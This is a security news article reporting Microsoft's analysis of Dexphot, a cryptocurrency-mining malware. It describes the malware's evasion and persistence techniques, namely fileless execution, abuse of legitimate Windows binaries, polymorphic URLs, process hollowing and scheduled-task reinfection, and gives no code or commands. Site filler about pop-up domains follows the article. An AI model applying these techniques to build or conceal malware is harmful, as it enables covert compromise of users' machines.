The main goal of Dexphot has always been extraction of cryptocurrency and enrichment of its operators. However, despite quite ordinary goals of the malware, the researchers note that its authors used sophisticated techniques, and the harm itself was not so simple. The fact is that many of the techniques used by virus writers are more likely to be found studying the work of “government hackers”, but not just another miner.
“Dexphot was a second-level payload, that is, it infected computers already infected with the ICLoader malware, which penetrated the system along with various software packages, or when users downloaded and installed hacked or pirated software”, – say information security specialists at Microsoft.
Interestingly, the Dexphot installer was the only part of the malware that was written to disk for only a short period of time. For other files and operations, Dexphot used a fileless attack method, that is, it ran everything only in the computer’s memory, making the presence of malvari in the system invisible to classical antivirus solutions that rely on signatures.
Dexphot also used the LOLbins (living off the land) technique to use legitimate Windows processes to execute malicious code, rather than launching its own executable files and processes. For example, according to Microsoft, the malware regularly abused msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe. Using these processes to run malicious code, Dexphot actually becomes indistinguishable from other local applications that also used these utilities to do their work.
In addition, Dexphot used a technique called polymorphism.
“Dexphot operators changed the file names and URLs used in the infection process every 20-30 minutes. By the time antivirus solutions detected a pattern in the Dexphot infection chain, the latter one was changing. It allowed Dexphot stay one step ahead”, – said Microsoft experts.
Since no malware will stay unnoticed forever, Dexphot developers have taken care of the mechanism of a stable presence in the system. The malware used a technique called process hollowing to launch two legitimate processes (svchost.exe and nslookup.exe), clean their contents and run malicious code under their guise. These components, disguised as legitimate Windows processes, made sure that all parts of the malware were up and running, and reinstall the malware if necessary.
Read also: The expert created a PoC exploit that bypasses PatchGuard protection
Additionally, Dexphot used a series of scheduled tasks (regularly changing their names), so that the victim was re-infected without file after each system reboot or every 90 or 110 minutes. This functionality also made it possible regularly update the malware on all infected hosts. After all, every time one of the tasks was performed, the file was downloaded from the attacker’s server, and they could make changes to it.
About News-bpudepi.today News-bpudepi.today pop-ups can not launch out of the blue. If you have actually…
About Doguhtam.xyz Doguhtam.xyz pop-ups can not expose out of nowhere. If you have clicked some…
About News-xlixoti.com News-xlixoti.com pop-ups can not introduce out of nowhere. If you have actually clicked…
About Ducesousightion.com Ducesousightion.com pop-ups can not introduce out of the blue. If you have actually…
About News-xlabica.live News-xlabica.live pop-ups can not launch out of the blue. If you have actually…
About Mergechain.co.in Mergechain.co.in pop-ups can not expose out of the blue. If you have clicked…